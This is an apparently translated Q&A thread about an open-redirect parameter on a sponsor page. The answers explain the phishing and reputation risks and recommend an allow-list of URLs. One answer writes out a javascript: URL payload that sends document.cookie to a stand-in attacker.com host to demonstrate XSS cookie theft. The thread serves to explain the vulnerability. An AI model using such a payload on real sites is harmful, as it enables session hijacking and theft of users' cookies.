你能在这里找到网络安全问题吗?

时间:2008-10-17 01:20:34

标签: html security xss exploit

我有一个重定向到另一个网页的网页:

http://www.myOtherServer.com/Sponsor.php?RedirectPage=http://mylink.com/whereIwasgoingtogo.html

然后,Sponsor.php页面会显示一个广告,其中包含指向“继续浏览您的页面”的链接,该链接指向传入的RedirectPage。是否存在可能由此引起的安全/欺骗问题?处理这个问题的最佳方法是什么? (请注意,用户未登录任一站点)

3 个答案:

答案 0 :(得分:10)

这是一个大问题。如果我发给你的链接如下:

 http://cnn.com/sponsor.php?redirectpage=http://bit.ly/jh2l14

你会想到“哦,CNN,这是一个合法的网站”,然后你打开它并点击“继续你的页面”链接。然后你就会进入网上最讨厌的色情网站之一,它会向你的所有同事宣布一个巨大的男性声音“我想要的热门话题!@ $ @#$你的! (&¤& ^ $§直到我不能¡^(!#~~& $ ^#!@ $ !! )并且你必须向你的老板解释“我以为那是CNN!“

此处的漏洞是您的声誉。像这样的盲目重定向是危险的。

那只是一洞。怎么样?

 http://cnn.com/sponsor.php?redirectpage=javascript:location.href='http://attacker.com/' + document.cookie

现在我已经对您的网站进行了XSS编辑并窃取了用户的Cookie。当然,你说没有登录信息,但会话数据怎么样?或者,稍后添加登录信息,或者公司中的其他人在一年后用户登录时使用此页面。

答案 1 :(得分:0)

这绝对是一种安全风险。在涉及安全性时,应避免使用in-URL变量。

虽然没有什么是完全安全的,但这是解决此问题的更好方法:http://www.webmasterworld.com/forum88/2910.htm

答案 2 :(得分:0)

如果sponsor.php允许任何值进入RedirectPage和广告意味着支持,或鼓励人们认为他们在正确的轨道上,那么您将打开它成为网络钓鱼攻击的一部分。更糟糕的是,你可能会从这些攻击中获利,这可能会让人们感到不高兴。

保留允许的网址列表(或他们可以遵循的模式)将大大有助于防止出现问题。